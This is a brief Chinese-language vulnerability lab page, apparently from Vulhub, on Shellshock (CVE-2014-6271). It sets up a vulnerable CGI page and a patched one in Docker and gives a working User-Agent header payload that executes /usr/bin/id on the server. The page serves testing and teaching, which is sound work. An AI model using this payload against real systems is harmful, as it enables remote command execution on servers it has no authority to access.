Shellshock 破殼漏洞(CVE-2014-6271)
Path bash/shellshock
編譯運行:
docker-compose up -d
服務啟動后,有兩個頁面http://your-ip:8080/victim.cgi和http://your-ip:8080/safe.cgi。其中safe.cgi是最新版bash生成的頁面,victim.cgi是bash4.3生成的頁面。
將payload附在User-Agent中訪問victim.cgi:
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id
命令成功被執行:

同樣的數據包訪問safe.cgi,不受影響:

Vulhub 文檔
推薦文章: